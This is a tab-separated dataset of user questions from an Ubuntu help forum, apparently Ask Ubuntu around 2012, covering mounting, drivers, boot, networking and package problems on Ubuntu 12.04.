178087	error mounting an external hdd	i want to mount an external hdd.i have tried many things but still no success.when i try to mount it from disk utility i get this error : error mounting : mount exited with exit code 1 : helper failed with : unprivileged user can not mount ntfs block devices using the external fuse library . either mount the volume as root , or rebuild ntfs-3g with integrated fuse support and make it setuid root . please see more information at tuxera.com/community/ntfs-3g-faq/ # unprivileged
178088	configuring for automatic boot over avahi kernel requires an x86-64 but i686 detected	i want to add a node like here but when i mount pendrive i received an error like this : this kernel requires an x86-64 cpu but only detected an i686 cpu i have some old hp compaq 's with pentium 4 ht and i ca n't add this computer .
178091	how to disable grub 's menu from showing up after failed boot	i am performing a test in which i hard-reboot a machine with ubuntu during its boot sequence ( just before login prompt appears ) . after the reboot , grub 's menu shows up with no timeout ( not its rescue-mode , but the usual menu ) , as opposed to before reboot where grub had a timeout and started to boot ubuntu . i am using a fresh installation of ubuntu 12.04 lts server for my tests . although it is a nice feature for recovery , i would like grub to continue the `` usual boot '' sequence with the default timeout , instead of the `` fail-safe '' mode where it waits for input , even if previous boot failed . how is it possible ?
178094	skype 12.04 does n't open anymore	skype does n't work anymore . it used to work fine . then the webcam stopped working i tried to fix this and ever since it just wont open at all . my computer is a dell 1525 intel core 2 duo with a built in webcam
178107	laptop wo n't connect to wi-fi router	i have ubuntu in one of the laptops i own . since yesterday , and for no apparent reason , it is not able to connect anymore to my wi-fi router ( i tried to forget the network and disabled security , still not connecting ) . the confusing thing is that : the laptop is able to connect to other wi-fis . my other devices are able to connect to my router 's wi-fi . it is like the router and the laptop got mad with each other . so i do n't really know how to interpret this . any idea ?
178109	ctrl+ shortcuts does n't work after compiz-manager installation	it was working on gnome fallback/classic . but after compiz-manager package installation , i lost ctrl + shortcut keys , they do n't work anymore . for example , in web browser typing ctrl+c on some text makes it gray , and do n't get it copied . deleting compiz-manager and reinstalling gnome did n't solve the problem . however , on gnome shell 3 all works fine . please , help me to solve this .
178118	running linux executables on ntfs partition marked with execute permission	i have just installed ubuntu 12.04 , i used ntfs-config to auto-mount the ntfs partition on boot and i checked that the fstab file is configured as usual with ntfs-3g and with write and execute permissions . i also verified that all files are listed with rwx to everybody . the problem is that whenever i try to run linux executable files ( linux binary ) located on the ntfs partition , it says : no such file or directory . any help is appreciated .
178121	why samba share files are not able to access by some user for some time ?	i 'm running samba on ubuntu server 10.04 lts , i 've some folders on samba share and created some user to access it , but suddenly some of the user are not able to access it for a certain time only . for i.e : there are 5 users as a , b , c , d , e and there are two folders in samba share name as `` test '' and `` develop '' '' test '' does n't have any user access password but `` develop '' has user access with password . now a , c , e are able to access folder `` develop '' with their samba password but b , d are not able to access with their samba password for some time only or if i use b-username & password in a or c laptop its working fine at that time . while connecting to samba share , below error message appears : an error has occurred while connecting [ drive letter ] : to [ share name ] microsoft windows network : the local device name is already in use . this connection has not been restored . this happens randomly with the username & laptops . i restarted entire network & server & laptop but still does n't work . any solution for this ?
178122	share user folder along different versions of ubuntu running gnome classic desktop	whenever i did installed several versions of ubuntu in order to test and choose , i would like to know how can i share the same /home folder or the same /home/user folder . all these installations have the same user name with the same password . specially i would like to share the firefox history & bookmarks , also than the download folder . anywhere i run the gnome classic desktop . all the installed distributions are in the same disk .
178123	is there a guide for using grsecurity and precisew/ pax ?	i 'd like to know if there is a guide of some kind for ( successfully ) configuring , compiling and installing grsecurity w/pax etc . in precise ? i basically am trying to build my own custom release based off of ubuntu server and gnome 2 , with the concept of having a distro that is stable , compatible with everything , focused on gpgpu computing , like cuda , and some security/forensic tools , but with just minimal apps and services needed and nothing more , and of course really secure . i wont go into all of the detail but i insist on it being the way it is , and using ubuntu server as the base for many reasons ( it 's fully encrypted btw too ; ) . i 'm not just wanting a gui for standard server tasks . i wanted to build my own because of the things mentioned above but also i have n't really found a release , other than ~ubuntu , that has all the tools etc . that i need for the specialized computing requirements i have and i know ubuntu can definitely do a great job here too ! everything is great so far but i 've run into several snags when trying to install grsecurity . i 've googled and googled , read many blogs , sites etc and they either are n't up to date , not that applicable , or there is some kind of issue and error , so that 's why i was wondering if there might be something up to date or some kind of help out there for this type of task , or just the best advice someone could offer on hardening it . i went to the # ubuntu irc chan and they said to ask here , lol . any other help or advice regarding anything above would be welcome too . many thanks !
178125	getting setgid : operation not permitted error while running 'su ' command - ubuntu 12.04	i am logged in with imp user . and when i am trying to login via root user on terminal : impuser @ machine : ~ $ su - root it gives : setgid : operation not permitted any idea , how to resolve this issue ?
178130	my notebook wo n't boot from usb as if no usb-stick is connected . what could be the problem ?	i was just about to install ubuntu on my notebook ( acer aspire one ) and i had to boot from usb because i 've got no cd-rom on my pc . it seems pretty simple , but it keeps booting from the hdd as if the usb was n't there ...
178140	xinput coordinate transformation matrix in xorg.conf	how do i set the coordinate transformation matrix in xorg.conf ? https : //wiki.ubuntu.com/x/inputcoordinatetransformation right now , i have it set in a script on startup , but ideally - i would like to be able to unplug the screen and plug it back in and the settings still be used .
178141	how to test whether port forwarding is working ?	i have done port forwarding on my computer but i do n't know how to test it . can anyone help me ? i have not done it using iptables but i have done it by following the instructions given in this link .
178142	the settings in the settings manager have no affect	the problem is that when i try to change the options from the system settings from the panel tray it does not change . i removed unity and installed it again but the same problem continues , even after trying unity -- reset still the problem persists . even the icon settings are not persistent , i mean when i close and open they get back to the default ( i mean close and again not restarting ) . any help ?
178143	black screen after installation of a command-line version of ubuntu 12.04	i just installed ubuntu 12.04 ( command line version ) on an old machine ( athlon 1,2 ghz , 1gb ram , [ sis ] 65x/m650/740 graphics ) . when i boot the screen turns black after the bios messages . even grub does n't appear . the system reboots if i press ctrl+alt+del . ctrl+alt+f2 ... does n't bring my to any tty . however i can access the machine via ssh ( i installed it in expert mode and selected open-ssh-server during installation ) . in spite of the black screen i tried to type in blind my username and password . then i did touch test and i was able to verify via ssh that this created a file named test . any ideas how to fix this ? edit : i insalled xinit and started blind startx but there was no x session , only a black screen . however i can verify via ssh that x was running . here is my /var/log/xorg.0.log : http : //pastebin.com/rizbcvfd here is my dmesg : http : //pastebin.com/kfbdphs9 here is my syslog : http : //pastebin.com/w9s0v6t8 here is the output of lsmod : http : //pastebin.com/nzwasexq
178146	how do i install ckan ?	i am new to ubuntu and i have some weird problem . i am trying to install a package called ckan . when i run the command sudo apt-get ckan , i have always the same answer : 'unable to locate the package ' . in fact , i notice i have the same problem with any package . in the 'sources.list ' file in the /etc/apt/ folder i have the following information . i tried to update , but the problem still remains the same deb cdrom : [ ubuntu 12.04 lts _precise pangolin ... ] deb http : //archive.ubuntu.com/ubuntu/ precise main restricted deb http : //archive.ubuntu.com/ubuntu/ precise-security main restricted deb http : //archive.ubuntu.com/ubuntu/ precise-updates main restricted could anyone help ?
178148	booting to terminal on startup , video driver problem ?	i posted another question yesterday trying to determine if i had the proper video drivers installed and if my card was operating as it should . that was because i had some serious slow-downs in a game ( through wine ) . i know this machine is beyond capable of running the game ( as it had in a windows virtual machine ) . i fiddled with it yesterday and tried reinstalling some things ( it 's a radeon hd 4800 series ) . when i turned the computer on this morning and it booted to terminal after displaying the purple splash screen for an instant . it allows me to login and then sits at my terminal name . as per a few other threads i tried the startx-command , while everything seems to be in order i did get this , which i assume is the problem : ( == ) using config file : `` /etc/x11/xorg.conf '' < br > ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' < br > ( ww ) fglrx : no matching device section for instance ( busid pci:0 @ 1:0:1 ) found segmentation fault at address 0xc < br > caught signal 11 ( segmentation fault ) . server aborting i have no doubt it 's related to my video driver problems , i am just not sure how to proceed from terminal as i 'm pretty new to using terminal commands .
178152	pulseaudio not responding , every program that tries to access it freezes	i recently installed 12.04 ( 32-bit ) on a new pc build ( asus sabertooth-z77 motherboard with realtek alc892 audio chipset ) . i have no sound , the volume control panel applet does n't show a slider , and i ca n't access the sound settings . attempting to access the sound settings from the system settings window causes that window to become non-responsive . firefox and chrome both become non-responsive when something in them triggers an audio event , e.g . attempting to play a flash video or receiving a message in fb . banshee and rhythmbox both become non-responsive immediately upon loading . pulseaudio does not respond to cli commands , including -- kill . attempting to play a .wav file from cli with aplay hangs until i ctrl+c it . if i uninstall pulseaudio , alsa takes over and i get audio , but i could n't get a panel applet to display or a volume button response even after attempting the instructions here . i tried purging pulseaudio , deleting ~/.pulse and reinstalling , to no effect . aplay -l returns the following : **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc892 analog [ alc892 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : alc892 digital [ alc892 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 9 : hdmi 3 [ hdmi 3 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 not sure what else to try , any suggestions would be appreciated .
178154	wine installation error	i tried installing wine using the terminal and i got a message to accept , and so i tried pressing the ok button in the terminal but it did n't work . then i forced the terminal to close and tried the process again but i still got an error . so then i tried ubuntu software center . when using that i got a message to accept the terms and conditions and i also accepted that . and then i went on installing and then it suddenly stopped . i waited for an hour but it was stuck ... . when i tried the procedure again it showed that it was installing but the process bar was still on zero . does anyone know what the problem is here ?
178159	how do i run asciiquarium in out-of-the-box ubuntu ?	asciiquarium is a perl script that requires term : :animation . what are the appropriate hoops to jump through to get this cpan module into an ubuntu perl install ? apt-cache search animation |grep -i perl does n't seem to find anything like libterm-animation-perl to just apt-get blindly .
178160	statis `` review in progress '' since one month and one week for my open source app	i am the author of the application `` interest calculation '' which was developed for the ubuntu app showdown . i have never received an answer for my questions , i wrote in the section `` feedback '' on the ubuntu app portal which is for uploading the application to get the software in the ubuntu software center . what are my options to get this app in the ubuntu software center ? ? note : on june this year , i added a proprietary software to the ubuntu software center . the process ( from uploading to publishing this app ) was very fast and easy . it took only two weeks to get the app to the ubuntu software center . also my questions from the section `` feedback '' were answered very fast ( within 24 hours ) . it seems much harder for me to get open source software to the ubuntu software center .
178161	3g usb modem is not working in 12.04	when i connect my 3g usb modem to my laptop with 12.04 , nothing shows up in network-manager . i tried method explained in this question , but nothing worked out . my usb modem is being detected as usb mmc storage , similar to situation in that post . both option 1 ( creating script ) and connecting through wvdial has failed . option 1 had worked once but , it was getting connected through gsm , not through gprs . when i try to connect through wvdial , it says no modem detected or busy . your assistance is greatly appreciated . thanks in advance .
178162	wifi very slow on ubuntu 12.04 but not on win7 , need help	i have an enormous problem : i 've a sony vaio vgn-nr21s with win7 and ubuntu 12.04 in dual boot . with windows everything is fine ( except that is windows ) but with ubuntu the wireless connection is awfully slow , basically unusable . i 've already search for similar discussion but the solution proposed did n't worked . i 've noticed this issue also in live mode both with ubuntu and linux mint . i 've installed ubuntu onto an acer that shows the same problem when connected via wifi to my router , so i think that maybe the issue is about compatibility with my home router . i really need help , i do n't want unistall ubuntu ! please tell me which output u need to help me , thanks .
178167	what bioinformatics and computational biology tools are available ?	today , i was asked to look for scientific version ( s ) of ubuntu . they actually are looking for tools to perform dna sequence analysis , protein verification , estimations , and many biology related tasks . first : is there a scientific , bio-oriented version of ubuntu are there tools to do scientific analysis like the points mentioned above .
178169	which software is suitable for downloading movies	which software is suitable for downloading movies . especialy from the site www.go8pm.com from there i like to download movies ( malayalam language-from india )
178172	duplicity errno21 when restoring from external hd	i 've just needed to reinstall ubuntu due to some graphics driver error , but before doing it i backup whole home directory onto an external hd . now when trying to restore it with deja-dup i get info about not existing directory or having no access . that 's why i used duplicity to directly restore it . i typed this command and got this : kamil @ kamil-k70ic : ~ $ duplicity file : ///media/buffalo/home /home/kopia synchronizing remote metadata to local cache ... gnupg passphrase : copying duplicity-full-signatures.20120820t111049z.sigtar.gpg to local cache . [ errno 21 ] is a directory : '/media/buffalo/home/duplicity-full-signatures.20120820t111049z.sigtar.gpg' do you have any idea about what did i do wrong or if it 's archive , which is broken ?
178174	nvidia gt218 repository drivers do n't work	i upgraded all packages with sudo apt-get upgrade command on my ubuntu 10.04 box and i have ubuntu 12.04 3.2.0-29-generic-pae now . i have two monitors and the following gpu : 01:00.0 vga compatible controller : nvidia corporation gt218 [ nvs 300 ] ( rev a2 ) after upgrading to 12.04 , i somehow lost my previous setup with one common workspace stretched across two monitors . when ubuntu starts only one monitor is on . i can see the message on the active monitor : not optimum mode . recommended mode : 1680x1050 60hz i used nvidia proprietary drivers on 10.04 but now jockey-text -- list shows : xorg : nvidia_current - nvidia accelerated graphics driver ( proprietary , disabled , not in use ) xorg : nvidia_current_updates - nvidia accelerated graphics driver ( post-release updates ) ( proprietary , enabled , not in use ) when i run sudo nvidia-settings it says you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run `nvidia-xconfig` as root ) , and restart the x server . ' i typed nvidia-xconfig and rebooted , but jockey-text -- list says the same after the reboot : not in use . the same with nvidia-current - enabled but not in use . i also tried nvidia-173 but i ended up in tty immediately at startup so i removed it . i used to have some problems with nvidia proprietary drivers on 10.04 , i had to put paths to edid files in /etc/x11/xorg.conf explicitly , but the resolution was as recommended and both monitors were working . if i understand correctly , nouveau drivers are used now by default because the resolution is still quite high , definitely not 800x600 , xrandr showed : xrandr : failed to get size of gamma for output default screen 0 : minimum 320 x 400 , current 1600 x 1200 , maximum 1600 x 1200 default connected 1600x1200+0+0 0mm x 0mm 1600x1200 66.0* 1280x1024 76.0 1024x768 76.0 800x600 73.0 640x480 73.0 640x400 0.0 320x400 0.0 1680x1050_60.00 ( 0x4f ) 146.2mhz h : width 1680 start 1784 end 1960 total 2240 skew 0 clock 65.3khz v : height 1050 start 1053 end 1059 total 1089 clock 60.0hz however , colors seem a bit faded and blurry with nouveau drivers . mouse cursor is invisible if it 's placed inside firefox window , and only one monitor is working . i like open source and if it 's possible i 'd prefer to use nouveau drivers but a few things should be fixed . i 'm curious why nvidia-current drivers from the repository do n't work now . i read it has something to do with the new x11 server in ubuntu 12.04 , is it true ? how can i get it back to work ?
178175	how do i install regnum online ?	i 'm fairly new to ubuntu ( or linux for that matter ) so please bear with me . i just installed ubuntu a day or so ago and went looking for an mmo for it . i am using ubuntu 12.04 32-bit and i downloaded regnum online from this page . fast forward to me who just finished downloading the 700mb or so file , when i double clicked on it , it said : could not display `` /home/myname/downloads/roinstall_32 '' . there is no application installed for executable files . do you want to search for an application to open this file ? [ no ] [ yes ] clicking yes , it scanned for a few moments then came up with pypar2 so i installed it . after installing pypar2 , i ran it again but i had the feeling i was being whisked further and further away from my goal which is simply to install the game onto my system . pypar2 was talking about protection and whatnot so i decided to just quit it and post here and ask for help . for clarification , yes , i downloaded the linux version and the download link looked like this .
178181	uninstalling ubuntu from a netbook	i recently bought a netbook off a friend . it 's a dell inspiron mini and originally ran windows 7 . however at some point he installed ubuntu on it and i do not have the tech savy to use it properly . i want to uninstall this and put windows back on , however as it is a newbook there is no cd drive to use . what do i do ? please keep in mind that -this is not a dual-boot , the is only ubuntu on here . -there is no cd drive .
178184	updating to windows 8 on dual boot with ubuntu	i dual boot ubuntu 12.04 and windows vista on separate partitions . i want to update vista to windows 8 , but i 'm worried that it will mess something up . how should i prepare for the update ? how can i recover dual boot both to ubuntu and windows after update to windows 8 ? ( i assume that windows still considers itself `` one os to rule them all '' and wipes out other boot options without asking . ) are there any gotchas in general that i should be aware of ? update so in the end , i did n't have to do anything after updating windows : ) . after it installed and i restarted computer , i got the same boot menu as always .
178187	make ctrl+alt+l show login screen	i 've been messing with some things and the lock screen is not working well at the moment . since i like the standard login screen much better anyway , i would like to change the action for the ctrl+alt+l shortcut . at the moment , it does the same thing as `` lock screen '' in the top-right power/settings menu . i would like it to instead have the same effect as `` switch user account '' on the user menu . how can i do this ? fyi , i 'm using 12.04 with the classic gnome session . things might look somewhat different in unity .
178191	ubuntu boot cd unable to burn on disk utility	i have downloaded the iso file of ubuntu and i am trying to burn a boot cd from disk utility the burn goes all the way to the end and right before ejecting cd it read burn failed 2012-08-19 20:13:27 -0700 : the disc drive didn’t respond properly and can’t recover or retry . 2012-08-19 20:13:28 -0700 : additional information can be found in the ~/library/logs/discrecording.log log file . 2012-08-19 20:13:28 -0700 : unable to burn “ubuntu-12.04-desktop-amd64.iso.” ( the disc drive didn’t respond properly and can’t recover or retry . ) can anyone explain this do i have a bad superdrive or am i doing something else wrong i am on a mid 2007 macbook any support would be nice thank you .
178192	squid proxy server not working ubuntu 12 04	long time ago while using ubuntu 10.04 i have install squid server and webmin and never check it . i know that webmin wont work for long time with ubuntu higher level so that why im back using 10.04 at that time . then i try to install ubuntu 12.04 by taking risk its ok without webmin as far squid still work .. i dont check it after install the 1st beta version of 12.04 and now .. i just wondering why it takes so long time to opening some games on fb or loading cnn news page then i try to check and restart also try to install it but i ca n't get the access to squid . i try to go from directory santos @ santos : /etc $ cd squid bash : cd : squid : no such file or directory santos @ santos : /etc $ here my screenshot how to have squid server for cache internet activity for ubuntu 12.04 ? are there any other option ?
178193	how can i stop adobe flash from crashing	after switching to ubuntu 12.04 , adobe flash crashes every time i try to share my video . what can i do ? i 've tried uninstalling and reinstalling adobe flash .
178194	how to install the nginx manpage when i installed nginx from source ?	i installed nginx 1.2.0 from source on ubuntu 12.04 ( precise ) but it says there is no manpage entry for nginx when i run man nginx . how to i install it ?
178196	is there a log which records the creation of directories ?	i 'm trying to track down why and when a particular directory is created in my home folder . i 've learned i can utilize lsof | grep /home/**myusername**/**mysteriousfolder** to discover the file or process responsible for creating the folder . unfortunately , if the responsible process/file is no longer running , the suggested command gives no output . as of yet , i have been unable to catch it 'in the act . ' i 'm looking for a log i can parse to discover when exactly this folder is getting created . so i 'm realizing i can at least do ls -ld and view the 'last modified ' date but i 'm still curious if any log file exists .
178205	pdf to xml sure thing , but the other way around ?	this is my first post so excuse me if i 'm breaking any conventions . well the thing is i 'm developing a long term archive system in ubuntu environment . for different reasons xml is a very strong format for long term archiving and there are numerous systems on the market today that 's offering export functions to the xml format . the xml format it self contains no graphical information what so ever of how , for instance a pdf-file looked like , just the written information and embedded pics it once contained . so given i have a certain pdf-file it 's possible to strip it down to xml and then rebuilt it once again to the pdf-file it once was - at least in theory . in linux you could do this from cli with the help of xsltproc and fop in two steps . xsltproc file.xsl file.xml > file.fo fop file.fo file.pdf the absolutely crucial file here - if you want to rebuild it just the way it was - is the xsl-file . i have found hundreds of posts discussing how to create xsl-files by hand but none regarding any software that could analyse the xsl-structure of a pdf-file . i just reckon if it 's possible to transform from xml-xsl-fo-pdf it must be possible to do this process backwards ? anyone has any ideas ? paul
178206	problems after running unity-reset	after installing compiz-config on ubuntu 12.04 , my whole desktop settings got disturbed . no window control buttons ( min , max & close ) and no window wobbling as earlier . so i executed the command unity-reset . now there is no panel and no launcher either . i have tried to change settings in ccsm , but nothing works . please suggest . aviral
178212	how do i get the touchpad on an asus n56vz working properly ?	i just got my new asus laptop today , and after installing ubuntu i experienced some weird mouse behaviour , at least a new behaviour to me . it seems the mouse is in mac-theme , no right clicking but two-finger tapping etc . i also see , what i would call , anchor points around the windows , i would like those gone . left-clicking and dragging , e.g. , a scroll bar does not work , as the area that gets pressed down is a part of the touchpad . since multitouch is not supported , clicking with one finger and dragging with another does not work . for clarification , both buttons behaves like left click . laptop is an asus n56vz
178222	need a way to automatically move files on a daily basis	my ubuntu system is set up as an ftp server . i have several networked security cameras which send hundreds of mpeg4 video clips to the ftp server every day . these files are stored on a usb-attached external hdd . each file is about 1.5mb . this works well . the computer is an old laptop with minimal processing power but its only purpose is to save the ftp 'd files . i 'm running 12.04 . my problem is that the folders the video clips are stored in eventually have thousands of files . just to open a folder to view the clips takes up to a half hour . and forget about trying to drag/drop these files to another folder - that will take hours or days . what i would like to do is , on a daily basis , have all files older than a week moved to a series of backup folders that are created automatically and named by the year/month/week . this will keep the number of files in each folder manageable and readily indexed by the week of the year . no need to compress the files as they are already mpeg4 and i have plenty of storage . i 've looked at several backup/archival apps and just ca n't seem to find something that will do what i need . are there any apps that can do such a thing ? if not , i imagine a cron job that runs a script would be appropriate but from what i 've read up on so far , it 's getting too complex for my experience level with linux command line . thanks .
178223	ubuntu 12.04 boot freeze at purple screen	in the last week or so ubuntu has started freezing on boot , showing only a purple screen . it freezes before the screen saying ubuntu with small dots under it comes up . the keyboard and mouse does n't seem to respond to anyting and nothing happens if i just wait some time . it seems to be coming at almost random but usually with a few days in between . i have been running ubuntu since it was first released and before the freezes started happening i had no problems at all . but now when i hover an application in the launcher bar , the popup with the name on it will sometimes act weird or not show properly . i do n't know if that has anything to do with the freezing . any help ? thanks . i 'm running ubuntu 12.04 with bumblebee and only a few other applications installed . my computer is a samsung q330 : intelâž coreâ˘ i3 processor 330m ( 2.13 ghz , 3 mb ) 4gb ( ddr3 / 2gb x 2 ) nvidia geforce 310m 320 gb ( 5400 opm s-ata )
178227	why is the following bash command not working properly ?	i have the following bash command : $ ( ls -l /var/ | grep www ) > cat folder_exists but it is not working properly . what i hope to achieve is a command , that checks to see if there is a www folder located inside the /var/ folder , and prints the result of that particular command to the file folder_exists . i have also tried to retype the command numerous times , example given cat $ ( ls -l /var/ | grep www ) > folder_exists or even cat $ ( ls -l /var | grep www ) > folder_exists just in case that slash did the damage , but to no avail . my problem is that even though i am creating the file folder_exists , i fail to print the output to it . could somebody please show me where i have gone wrong ?
178230	specific image viewing app	i am trying to find the lightest possible image viewing program to perform a very specific task . i have a large folder of images in various formats ( jpg , png , gif ) . i want to view these images in a randomized order , either as a slideshow or scrolled through manually , with the animated gifs er , animating . thoughts ?
178231	permissions issue when trying to save file to /var/www	i have install php from this article on my ubuntu computer http : //www.howtogeek.com/howto/ubuntu/installing-php5-and-apache-on-ubuntu/ now when i tried to save a simply php file i am unable to do that . i have no access to that folder var/www $ chmod +x /var chmod : changing permissions of `/var ' : operation not permitted i am not sure what this command do . can someone let me know how to get it worked then i can save file from any software i use . i just have install php and it 's work fine and this post is about giving 'var/www ' permission that i can save the file their . thanks now after a restart my computer i got my permission worked .
178246	which 12.04 download should i choose for x86 based pc ( 32-bit ) with an amd processor ?	the ubuntu-12.04-desktop-i386.iso will not work with my processor . i tried to run it from my live usb stick and a message appears this can not be installed with your processor . which alternative download should i choose for an x86 based pc with a x86 family 6 model 6 stepping 2 authentic amd processor running at 1254 mhz ? proceeding to the alternative versions , i am given the following options : ubuntu-12.04-alternate-amd64.iso.torrent ubuntu-12.04-alternate-i386.iso.torrent ubuntu-12.04-desktop-amd64.iso.torrent ubuntu-12.04-desktop-i386.iso.torrent ubuntu-12.04-server-amd64.iso.torrent ubuntu-12.04-server-i386.iso.torrent
178255	how to avoid shutdown freeze on a mac with ubuntu 12.04 ?	i just installed my old macbook white with a fresh ubuntu 12.04 as single os on the machine , all runs pretty good , but every time i shut it down or restart the machine gets stuck in the `` ubuntu ... .. '' splash screen , how can this be solved so i do n't have to force power it off ?
178256	how do i edit the autosave interval of gedit ?	can you people tell me how to edit gedit , please ? i want to change the autosave feature so that it saves every 1 second , i was able to investigate further that i needed gconf-editor so i installed it but when i launched it and went to /apps/gedit-2/preferences/editor/save/auto_save it says : this key has no schema , so i found this : http : //www.mail-archive.com/scientific-linux-users @ listserv.fnal.gov/msg08917.html but it does n't work . i would really like to do this , but , otherwise , what is the best solution ? to change the source code and compile and gedit with autosaves of only 1 second ?
178261	how to install kernel from 12.10 into 12.04 ?	i would like to install the current kernel that is in quantal quetzel into another distribution i have of precise pangolin ? if you are wanting to know why this is , its because the current quantal kernel supports my sandy bridge chipset best , and it also is working great even as its in the alpha stage , on my laptop . so i want to install it into my kubuntu 12.04 . what is the best method to do this ? should i compile from ubuntu source directly , or is it possible somehow to just add a quantal repository to precise and have apt download and install the current quantal kernel and headers for me ?
178262	setting up java_home and classpath correctly on 12.04	i am having some issues with java ( openjdk java 7 runtime ) on ubuntu 12.04 , and just want to make sure i have my classpath and java_home variables set correctly . classpath= '' . : /usr/local/sbin : /home/king/documents/bin/java/jar/* : /home/king/documents/bin/java/jar/log4j.xml : /opt/fop/build/fop.jar '' java_home= '' /usr/lib/jvm/java-7-openjdk-i386/bin '' is my java_home varibale set right here ? i am wondering if it should be set to java_home= '' /usr/lib/jvm/java-7-openjdk-i386/jre '' instead ? my main issue i am having is with log4j log4j : warn no appenders could be found for logger ( org.apache.fop.util.contenthandlerfactoryregistry ) . log4j : warn please initialize the log4j system properly . i have the file `` log4j.xml '' in a location on the classpath , so i am confused about the problem .
178269	not getting past the login screen	i downloaded and installed ubuntu then rebooted my laptop . from there , i booted up with ubuntu instead of windows 7 and it took me to a loading screen , saying launching for first time or something . then it took me to a login screen where i then typed in my password then it just stayed at this ( see image below ) . i could move my mouse but nothing else .
178270	only root can mount , why ?	i am dual booting ubuntu 12.04 and windows 7 . i looked at my /etc/fstab yesterday and realized it did not contain my windows 7 partition . so i added it myself , but now it tells me it can not mount the partition . my /etc/fstab now looks like this : # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # ubuntu /dev/sda6 uuid=581c89aa-d71c-460c-96c0-04f188fe862a / ext4 errors=remount-ro 0 1 # swap /dev/sda5 uuid=99b951b9-1a57-43ee-938e-fe31b1ba754f none swap sw $ # windows /dev/sda3 uuid=12aa9e31aa9e1179 /media/12aa9e31aa9e1179 ntfs errors=remount-r0 0 2 i am trying to mount it by opening a file browser and simply clicking the drive with my mouse . what did i do wrong here when editing my fstab ?
178276	how to remove gnome from login screen after uninstalling gnome shell	i tried gnome-shell but did n't quite like it . after removing gnome-shell , i still have them in login menu . however , upon logging in with any gnome option , i get to the usual unity desktop . i had purged gnome-shell using apt-get , but seems like some component is still remaining . how do i remove gnome login options from lightdm login screen ?
178278	unity 3d does n't work with nvidia and 2 screens	i added a 2nd screen to my computer . now unity is not working . i can only login if i use unity 2d . any idea on how to solve this ? thanks !
178281	how to force update-alternatives to update jdk ?	i 've got java-6-openjdk and java-7-openjdk running on natty ( 11.04 ) on one machine and successfully toggle between them using update-alternatives -- config java for some reason this does n't seem to work on a second machine of identical spec . the sym links in /etc/alternatives gets updated when i run update-alternatives but when i check java -version or which java it 's always java-6-openjdk . i 've been running java 7 using the entire path but this is n't ideal as i do n't want to clutter build files with path names . any suggestions on what else i need to do to get update-alternatives to work ?
178282	how can i configure the guest user to only be able to run firefox ?	i realy need to give guest user less privileges : like in older versions . just firefox , thats it .
178283	ubuntu 12.04 and quad monitors ?	i am very interested in getting a quad monitor setup using ubuntu 12.04 . is this possible with unity ? will nvidia x server automatically detect and configure all 4 monitors making things easy ? i have dug up some bits and pieces of information here and there but do n't know what to make of everything .
178284	how do i integrate my windows filesystem with ubuntu ?	i recently got a new windows computer and would like to dual boot with ubuntu . i do n't really want to have 2 separate file systems ( with mounting ) but would like to integrate the two , if it is possible . like for example i would like my /home/name/pictures to have the same content as the pictures folder in my documents in windows , /home/name/downloads to be the same as the downloads folder in windows , music to be the same as the window 's music folder , and even desktop if possible . i understand some folders would have to be different , like appdata in windows would not be able to work properly so some duplicates might be necessary . is this at all possible ? i hate how having ubuntu feels like having a new computer all together and would like some unity ( no pun intended ) . thanks .
178297	i want to do a bridge between ubuntu and my ps3	hello i have been trying to put bridge mode on ubuntu basically my setup i 've got a router upstairs that i usually get wireless to my laptop which is connected ethernet to my ps3 , so my ps3 gets connected through my laptop ethernet wifi -- -- laptop -- -- -- -- -- - ps3 now on winxp this does n't pose me a problem at all i just select local area connection and the wireless connection just select them and click create bridge . howewer in ubuntu i could n't do it , so i started looking around etc and setting manually then i installed bridge-utils , firestarter and netbridge still nothing then i used the command sudo ifconfig . i was looking to see if i add any device with that unknown mac address for eth0 which i had n't so i looked around more and there is an utility that changes the mac address . however as soon i change the mac address it resets itself right away . is there a fix to this so that it is set permanently because that is not recognized anywhere . sudo ifconfig eth0 down sudo macchanger -m xx : xx : xx : xx : xx : xx eth0 sudo ifconfig eth0 up these are the commands i use . is there a way to edit them into a script and put the script somewhere to make this solution permanent ? i 've seen somewhere that you could edit them in sysconfig but i used ctrl+h and did n't find sysconfig and those files to edit there . any help is appreciated thanks edit : i forgot to say i am running ubuntu version 11.10
178299	how do i downgrade nautilus 3.6 in ubuntu 12.10 to nautilus 3.4 ?	i dislike the new nautilus . how do i downgrade it ? for those who wonder why i do n't just use 12.04 ; the drivers for my graphics card on my laptop are n't available in ubuntu , and i did n't want to use unity 2d .
178300	is there any way to get out of a frozen game without going to command line ?	it would be pretty simple , i hit the super key and it brings up the launcher over my frozen game . but it opens it up to search for an application . alt-f1 should bring a keyboard controlled launcher , that would work , but it wo n't open in game . only super key opens the launcher while in a game , but it does n't open it up in a way to close it . i know i could always pgrep and kill , but it would be nice just to be able to open up the launcher in game and kill it from there . is there any way to bring up the keyboard controlled launcher when in a frozen game ? [ edit ] xkill is usually great but it does n't exactly work when your in a game that 's frozen . hitting super may or may not open the launcher . maybe i can bind a new hotkey to launch xkill ...
178303	how do i update to gnome 3.5 on 12.04 ?	im currently on ubuntu 12.04 x86 with gnome 3.4 installed . is there a way to update/upgrade it to the 3.5 branch ?
